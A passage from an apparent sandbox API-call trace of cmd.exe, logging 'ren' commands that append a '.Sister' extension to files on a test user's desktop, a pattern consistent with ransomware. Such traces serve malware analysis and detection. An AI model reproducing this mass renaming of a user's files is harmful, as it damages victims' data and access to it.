lpNumberOfCharsWritten=0xa6cf4fe588*=0x2) returned 1 [0171.252] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fe240, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0171.325] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0171.325] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0171.325] malloc (_Size=0xffce) returned 0x21ed95c0000 [0171.325] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0171.325] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0171.326] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0171.326] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0171.326] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0171.326] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0171.326] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0171.326] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0171.326] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0171.326] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0171.326] ??_V@YAXPEAX@Z () returned 0x1 [0171.326] GetProcessHeap () returned 0x21ed8c70000 [0171.326] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed937ee80 [0171.326] GetProcessHeap () returned 0x21ed8c70000 [0171.326] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937ee80, Size=0x8c) returned 0x21ed937ee80 [0171.326] GetProcessHeap () returned 0x21ed8c70000 [0171.326] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937ee80) returned 0x8c [0171.326] GetProcessHeap () returned 0x21ed8c70000 [0171.326] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x94) returned 0x21ed937ef20 [0171.326] GetProcessHeap () returned 0x21ed8c70000 [0171.326] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x108) returned 0x21ed937e590 [0171.327] GetProcessHeap () returned 0x21ed8c70000 [0171.327] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e590, Size=0x8c) returned 0x21ed937e590 [0171.327] GetProcessHeap () returned 0x21ed8c70000 [0171.327] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e590) returned 0x8c [0171.327] malloc (_Size=0xffce) returned 0x21ed95c0000 [0171.327] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0171.327] GetProcessHeap () returned 0x21ed8c70000 [0171.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64d40 [0171.327] GetProcessHeap () returned 0x21ed8c70000 [0171.327] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed94856f0 [0171.327] _wcsicmp (_String1="PUKKYc6CLfNruQwL4y5O.gif", _String2=".") returned 66 [0171.327] _wcsicmp (_String1="PUKKYc6CLfNruQwL4y5O.gif", _String2="..") returned 66 [0171.327] GetFileAttributesW (lpFileName="PUKKYc6CLfNruQwL4y5O.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\pukkyc6clfnruqwl4y5o.gif")) returned 0x20 [0171.327] GetProcessHeap () returned 0x21ed8c70000 [0171.328] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed9496e40 [0171.329] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed9496e50 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0171.329] SetErrorMode (uMode=0x0) returned 0x0 [0171.329] SetErrorMode (uMode=0x1) returned 0x0 [0171.329] GetFullPathNameW (in: lpFileName="PUKKYc6CLfNruQwL4y5O.gif", nBufferLength=0x7fe7, lpBuffer=0x21ed95c0000, lpFilePart=0xa6cf4fd660 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\PUKKYc6CLfNruQwL4y5O.gif", lpFilePart=0xa6cf4fd660*="PUKKYc6CLfNruQwL4y5O.gif") returned 0x30 [0171.329] SetErrorMode (uMode=0x0) returned 0x1 [0171.329] GetProcessHeap () returned 0x21ed8c70000 [0171.329] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed94860b0 [0171.330] _wcsicmp (_String1="PUKKYc6CLfNruQwL4y5O.gif", _String2=".") returned 66 [0171.330] _wcsicmp (_String1="PUKKYc6CLfNruQwL4y5O.gif", _String2="..") returned 66 [0171.330] GetFileAttributesW (lpFileName="PUKKYc6CLfNruQwL4y5O.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\pukkyc6clfnruqwl4y5o.gif")) returned 0x20 [0171.330] ??_V@YAXPEAX@Z () returned 0x1 [0171.330] malloc (_Size=0xffce) returned 0x21ed95c0000 [0171.330] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0171.330] malloc (_Size=0xffce) returned 0x21ed95cffe0 [0171.330] ??_V@YAXPEAX@Z () returned 0x21ed95cffe0 [0171.331] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\PUKKYc6CLfNruQwL4y5O.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\pukkyc6clfnruqwl4y5o.gif")) returned 0x20 [0171.331] malloc (_Size=0xffce) returned 0x21ed923fd00 [0171.331] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0171.331] FindFirstFileExW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\PUKKYc6CLfNruQwL4y5O.gif", fInfoLevelId=0x1, lpFindFileData=0x21ed9485700, fSearchOp=0x0, lpSearchFilter=0x0, dwAdditionalFlags=0x2 | out: lpFindFileData=0x21ed9485700) returned 0x21ed8d653a0 [0171.331] malloc (_Size=0xffce) returned 0x21ed924fce0 [0171.331] ??_V@YAXPEAX@Z () returned 0x21ed924fce0 [0171.332] ??_V@YAXPEAX@Z () returned 0x1 [0171.332] MoveFileWithProgressW (lpExistingFileName="C:\\Users\\FD1HVy\\Desktop\\PUKKYc6CLfNruQwL4y5O.gif" (normalized: "c:\\users\\fd1hvy\\desktop\\pukkyc6clfnruqwl4y5o.gif"), lpNewFileName="C:\\Users\\FD1HVy\\Desktop\\PUKKYc6CLfNruQwL4y5O.gif.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\pukkyc6clfnruqwl4y5o.gif.sister"), lpProgressRoutine=0x0, lpData=0x0, dwFlags=0x2) returned 1 [0171.371] FindNextFileW (in: hFindFile=0x21ed8d653a0, lpFindFileData=0x21ed9485700 | out: lpFindFileData=0x21ed9485700*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x839d0900, ftCreationTime.dwHighDateTime=0x1d5eb77, ftLastAccessTime.dwLowDateTime=0xedc064b0, ftLastAccessTime.dwHighDateTime=0x1d5e269, ftLastWriteTime.dwLowDateTime=0xedc064b0, ftLastWriteTime.dwHighDateTime=0x1d5e269, nFileSizeHigh=0x0, nFileSizeLow=0xd83f, dwReserved0=0x0, dwReserved1=0x0, cFileName="PUKKYc6CLfNruQwL4y5O.gif", cAlternateFileName="")) returned 0 [0171.372] GetLastError () returned 0x12 [0171.372] FindClose (in: hFindFile=0x21ed8d653a0 | out: hFindFile=0x21ed8d653a0) returned 1 [0171.373] ??_V@YAXPEAX@Z () returned 0x1 [0171.373] ??_V@YAXPEAX@Z () returned 0x1 [0171.373] ??_V@YAXPEAX@Z () returned 0x1 [0171.374] ??_V@YAXPEAX@Z () returned 0x1 [0171.374] GetProcessHeap () returned 0x21ed8c70000 [0171.374] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d64ec0 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c95980, Size=0x16) returned 0x21ed8c95500 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c95500) returned 0x16 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8c7d330, Size=0x20) returned 0x21ed8c7d330 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8c7d330) returned 0x20 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x150) returned 0x21ed937e9f0 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937e9f0, Size=0xb2) returned 0x21ed937e9f0 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937e9f0) returned 0xb2 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68710 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68710, Size=0x30) returned 0x21ed8d68710 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68710) returned 0x30 [0171.375] GetProcessHeap () returned 0x21ed8c70000 [0171.375] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x4012) returned 0x21ed8d68750 [0171.376] malloc (_Size=0x1ff9c) returned 0x21ed95c0000 [0171.379] GetProcessHeap () returned 0x21ed8c70000 [0171.379] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937ded0 [0171.379] GetProcessHeap () returned 0x21ed8c70000 [0171.379] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xac) returned 0x21ed937c610 [0171.379] ??_V@YAXPEAX@Z () returned 0x1 [0171.379] malloc (_Size=0x1ff9c) returned 0x21ed95c0000 [0171.379] GetProcessHeap () returned 0x21ed8c70000 [0171.379] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xae) returned 0x21ed937ca90 [0171.379] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", nBufferLength=0xffce, lpBuffer=0x21ed95c0000, lpFilePart=0xa6cf4fdd08 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFilePart=0xa6cf4fdd08*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe") returned 0x4d [0171.379] FindFirstFileW (in: lpFileName="C:\\Users", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x6c4849dd, ftCreationTime.dwHighDateTime=0x1d29fdc, ftLastAccessTime.dwLowDateTime=0x475bb883, ftLastAccessTime.dwHighDateTime=0x1d32742, ftLastWriteTime.dwLowDateTime=0x475bb883, ftLastWriteTime.dwHighDateTime=0x1d32742, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef80, cFileName="Users", cAlternateFileName="")) returned 0x21ed8d65340 [0171.380] FindClose (in: hFindFile=0x21ed8d65340 | out: hFindFile=0x21ed8d65340) returned 1 [0171.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x20fc850f, ftCreationTime.dwHighDateTime=0x1d32742, ftLastAccessTime.dwLowDateTime=0x9de5855d, ftLastAccessTime.dwHighDateTime=0x1d32744, ftLastWriteTime.dwLowDateTime=0x9de5855d, ftLastWriteTime.dwHighDateTime=0x1d32744, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef80, cFileName="FD1HVy", cAlternateFileName="")) returned 0x21ed8d64b60 [0171.380] FindClose (in: hFindFile=0x21ed8d64b60 | out: hFindFile=0x21ed8d64b60) returned 1 [0171.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x90bb1c58, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x90bb1c58, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef80, cFileName="Desktop", cAlternateFileName="")) returned 0x21ed8d64f20 [0171.380] FindClose (in: hFindFile=0x21ed8d64f20 | out: hFindFile=0x21ed8d64f20) returned 1 [0171.380] FindFirstFileW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe", lpFindFileData=0xa6cf4fda30 | out: lpFindFileData=0xa6cf4fda30*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x3476bd48, ftCreationTime.dwHighDateTime=0x1d32722, ftLastAccessTime.dwLowDateTime=0x90bb1c58, ftLastAccessTime.dwHighDateTime=0x1d6141f, ftLastWriteTime.dwLowDateTime=0x90bb1c58, ftLastWriteTime.dwHighDateTime=0x1d6141f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x21e, dwReserved1=0xd937ef80, cFileName="Desktop", cAlternateFileName="")) returned 0xffffffffffffffff [0171.381] malloc (_Size=0x1ff9c) returned 0x21ed923fd00 [0171.381] ??_V@YAXPEAX@Z () returned 0x21ed923fd00 [0171.382] GetProcessHeap () returned 0x21ed8c70000 [0171.382] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x74) returned 0x21ed8d67db0 [0171.383] ??_V@YAXPEAX@Z () returned 0x1 [0171.383] ??_V@YAXPEAX@Z () returned 0x1 [0171.383] GetProcessHeap () returned 0x21ed8c70000 [0171.383] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed8d68750, Size=0x490) returned 0x21ed8d68750 [0171.383] GetProcessHeap () returned 0x21ed8c70000 [0171.383] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed8d68750) returned 0x490 [0171.383] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fddc8 | out: _Buffer="\r\n") returned 2 [0171.383] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.383] GetFileType (hFile=0x50) returned 0x2 [0171.383] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0171.383] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd58 | out: lpMode=0xa6cf4fdd58) returned 1 [0171.453] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.453] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fdd98, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fdd98*=0x2) returned 1 [0171.533] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed8e50080 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0171.533] _vsnwprintf (in: _Buffer=0x21ed8e80160, _BufferCount=0x83e5, _Format="%s", _ArgList=0xa6cf4fddd8 | out: _Buffer="C:\\Users\\FD1HVy\\Desktop") returned 23 [0171.533] _vsnwprintf (in: _Buffer=0x21ed8e8018e, _BufferCount=0x83ce, _Format="%c", _ArgList=0xa6cf4fddd8 | out: _Buffer=">") returned 1 [0171.533] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.533] GetFileType (hFile=0x50) returned 0x2 [0171.533] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0171.533] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fdd88 | out: lpMode=0xa6cf4fdd88) returned 1 [0171.603] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.603] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8e80160*, nNumberOfCharsToWrite=0x18, lpNumberOfCharsWritten=0xa6cf4fddc8, lpReserved=0x0 | out: lpBuffer=0x21ed8e80160*, lpNumberOfCharsWritten=0xa6cf4fddc8*=0x18) returned 1 [0171.676] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.676] GetFileType (hFile=0x50) returned 0x2 [0171.676] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0171.676] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0171.774] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.774] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x21ed8d68720*, nNumberOfCharsToWrite=0x3, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x21ed8d68720*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x3) returned 1 [0171.849] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="%s ", _ArgList=0xa6cf4fe098 | out: _Buffer=" \"C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister\" \"CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.bat\" ") returned 144 [0171.849] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.849] GetFileType (hFile=0x50) returned 0x2 [0171.849] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0171.849] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe028 | out: lpMode=0xa6cf4fe028) returned 1 [0171.941] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.941] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x90, lpNumberOfCharsWritten=0xa6cf4fe068, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe068*=0x90) returned 1 [0171.999] _vsnwprintf (in: _Buffer=0x7ff66c5d7f60, _BufferCount=0x1fff, _Format="\r\n", _ArgList=0xa6cf4fe0c8 | out: _Buffer="\r\n") returned 2 [0171.999] _get_osfhandle (_FileHandle=1) returned 0x50 [0171.999] GetFileType (hFile=0x50) returned 0x2 [0171.999] GetStdHandle (nStdHandle=0xfffffff5) returned 0x50 [0171.999] GetConsoleMode (in: hConsoleHandle=0x50, lpMode=0xa6cf4fe058 | out: lpMode=0xa6cf4fe058) returned 1 [0172.115] _get_osfhandle (_FileHandle=1) returned 0x50 [0172.115] WriteConsoleW (in: hConsoleOutput=0x50, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2, lpNumberOfCharsWritten=0xa6cf4fe098, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fe098*=0x2) returned 1 [0172.193] GetConsoleTitleW (in: lpConsoleTitle=0xa6cf4fde10, nSize=0x104 | out: lpConsoleTitle="C:\\WINDOWS\\sysnative\\cmd.exe") returned 0x1d [0172.272] malloc (_Size=0xffce) returned 0x21ed8ea0920 [0172.272] ??_V@YAXPEAX@Z () returned 0x21ed8ea0920 [0172.273] malloc (_Size=0xffce) returned 0x21ed95c0000 [0172.273] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0172.273] _wcsicmp (_String1="ren", _String2="DIR") returned 14 [0172.273] _wcsicmp (_String1="ren", _String2="ERASE") returned 13 [0172.273] _wcsicmp (_String1="ren", _String2="DEL") returned 14 [0172.273] _wcsicmp (_String1="ren", _String2="TYPE") returned -2 [0172.273] _wcsicmp (_String1="ren", _String2="COPY") returned 15 [0172.273] _wcsicmp (_String1="ren", _String2="CD") returned 15 [0172.273] _wcsicmp (_String1="ren", _String2="CHDIR") returned 15 [0172.273] _wcsicmp (_String1="ren", _String2="RENAME") returned -97 [0172.273] _wcsicmp (_String1="ren", _String2="REN") returned 0 [0172.273] ??_V@YAXPEAX@Z () returned 0x1 [0172.273] GetProcessHeap () returned 0x21ed8c70000 [0172.273] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed937eac0 [0172.274] GetProcessHeap () returned 0x21ed8c70000 [0172.274] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed937eac0, Size=0x130) returned 0x21ed937eac0 [0172.274] GetProcessHeap () returned 0x21ed8c70000 [0172.274] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed937eac0) returned 0x130 [0172.274] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.274] malloc (_Size=0xffce) returned 0x21ed95c0000 [0172.274] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0172.274] GetDriveTypeW (lpRootPathName="C:\\") returned 0x3 [0172.274] GetVolumeInformationW (in: lpRootPathName="C:\\", lpVolumeNameBuffer=0x21ed95c0000, nVolumeNameSize=0x7fe7, lpVolumeSerialNumber=0xa6cf4fd960, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0, nFileSystemNameSize=0x0 | out: lpVolumeNameBuffer="SYSTEM", lpVolumeSerialNumber=0xa6cf4fd960*=0xb4197730, lpMaximumComponentLength=0x0, lpFileSystemFlags=0x0, lpFileSystemNameBuffer=0x0) returned 1 [0172.278] ??_V@YAXPEAX@Z () returned 0x1 [0172.278] GetProcessHeap () returned 0x21ed8c70000 [0172.278] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x138) returned 0x21ed8d62a90 [0172.278] GetProcessHeap () returned 0x21ed8c70000 [0172.278] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x250) returned 0x21ed93788c0 [0172.278] GetProcessHeap () returned 0x21ed8c70000 [0172.278] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed93788c0, Size=0x130) returned 0x21ed93788c0 [0172.278] GetProcessHeap () returned 0x21ed8c70000 [0172.278] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, MemoryPointer=0x21ed93788c0) returned 0x130 [0172.278] malloc (_Size=0xffce) returned 0x21ed95c0000 [0172.279] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0172.279] GetProcessHeap () returned 0x21ed8c70000 [0172.280] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x58) returned 0x21ed8d65160 [0172.280] GetProcessHeap () returned 0x21ed8c70000 [0172.280] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9484370 [0172.280] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0172.280] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0172.280] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0172.281] GetLastError () returned 0x2 [0172.281] GetProcessHeap () returned 0x21ed8c70000 [0172.281] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0xffde) returned 0x21ed94a6e30 [0172.281] GetCurrentDirectoryW (in: nBufferLength=0x7fe7, lpBuffer=0x21ed94a6e40 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop") returned 0x17 [0172.281] SetErrorMode (uMode=0x0) returned 0x0 [0172.281] SetErrorMode (uMode=0x1) returned 0x0 [0172.281] GetFullPathNameW (in: lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", nBufferLength=0x7fe7, lpBuffer=0x21ed95c0000, lpFilePart=0xa6cf4fd230 | out: lpBuffer="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", lpFilePart=0xa6cf4fd230*="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister") returned 0x54 [0172.281] SetErrorMode (uMode=0x0) returned 0x1 [0172.281] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop" (normalized: "c:\\users\\fd1hvy\\desktop")) returned 0x11 [0172.283] GetProcessHeap () returned 0x21ed8c70000 [0172.283] RtlAllocateHeap (HeapHandle=0x21ed8c70000, Flags=0x8, Size=0x260) returned 0x21ed9484fa0 [0172.284] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2=".") returned 53 [0172.284] _wcsicmp (_String1="CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister", _String2="..") returned 53 [0172.284] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0172.284] GetLastError () returned 0x2 [0172.284] ??_V@YAXPEAX@Z () returned 0x1 [0172.284] malloc (_Size=0xffce) returned 0x21ed95c0000 [0172.284] ??_V@YAXPEAX@Z () returned 0x21ed95c0000 [0172.284] malloc (_Size=0xffce) returned 0x21ed95cffe0 [0172.284] ??_V@YAXPEAX@Z () returned 0x21ed95cffe0 [0172.284] GetFileAttributesW (lpFileName="C:\\Users\\FD1HVy\\Desktop\\CUsersHARLAN4096Desktop11-04-2020#CS fun - MWTfun.exe.Sister" (normalized: "c:\\users\\fd1hvy\\desktop\\cusersharlan4096desktop11-04-2020#cs fun - mwtfun.exe.sister")) returned 0xffffffff [0172.285] GetLastError () returned 0x2 [0172.285] _get_osfhandle (_FileHandle=2) returned 0x54 [0172.285] GetFileType (hFile=0x54) returned 0x2 [0172.285] GetStdHandle (nStdHandle=0xfffffff4) returned 0x54 [0172.285] GetConsoleMode (in: hConsoleHandle=0x54, lpMode=0xa6cf4fd378 | out: lpMode=0xa6cf4fd378) returned 1 [0172.617] _get_osfhandle (_FileHandle=2) returned 0x54 [0172.617] GetConsoleScreenBufferInfo (in: hConsoleOutput=0x54, lpConsoleScreenBufferInfo=0xa6cf4fd3b0 | out: lpConsoleScreenBufferInfo=0xa6cf4fd3b0) returned 1 [0172.675] FormatMessageW (in: dwFlags=0x1a00, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0x0 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0172.675] FormatMessageW (in: dwFlags=0x1800, lpSource=0x0, dwMessageId=0x2, dwLanguageId=0x0, lpBuffer=0x7ff66c5d7f60, nSize=0x2000, Arguments=0xa6cf4fd450 | out: lpBuffer="The system cannot find the file specified.\r\n") returned 0x2c [0172.675] WriteConsoleW (in: hConsoleOutput=0x54, lpBuffer=0x7ff66c5d7f60*, nNumberOfCharsToWrite=0x2c, lpNumberOfCharsWritten=0xa6cf4fd3a0, lpReserved=0x0 | out: lpBuffer=0x7ff66c5d7f60*, lpNumberOfCharsWritten=0xa6cf4fd3a0*=0x2c) returned 1 [0172.800] longjmp () [0172.800] ??_V@YAXPEAX@Z () returned 0x1 [0172.800] FindNextFileW (in: hFindFile=0x21ed8c7cac0, lpFindFileData=0xa6cf4fe640 | out: lpFindFileData=0xa6cf4fe640*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x98dbd970, ftCreationTime.dwHighDateTime=0x1d5ef98, ftLastAccessTime.dwLowDateTime=0x5ab0e890, ftLastAccessTime.dwHighDateTime=0x1d5eef1, ftLastWriteTime.dwLowDateTime=0x5ab0e890, ftLastWriteTime.dwHighDateTime=0x1d5eef1, nFileSizeHigh=0x0, nFileSizeLow=0x124df, dwReserved0=0x0, dwReserved1=0xd8c00000, cFileName="qyx1bfBq1UB8.odt", cAlternateFileName="")) returned 1 [0172.800] GetProcessHeap () returned 0x21ed8c70000 [0172.800] RtlReAllocateHeap (Heap=0x21ed8c70000, Flags=0x0, Ptr=0x21ed9496ac0, Size=0x38a) returned 0x21ed9378a00 [0172.800] GetProcessHeap () returned 0x21ed8c70000 [0172.800] RtlSizeHeap (HeapHandle=0x21ed8c70000, Flags=0x0, 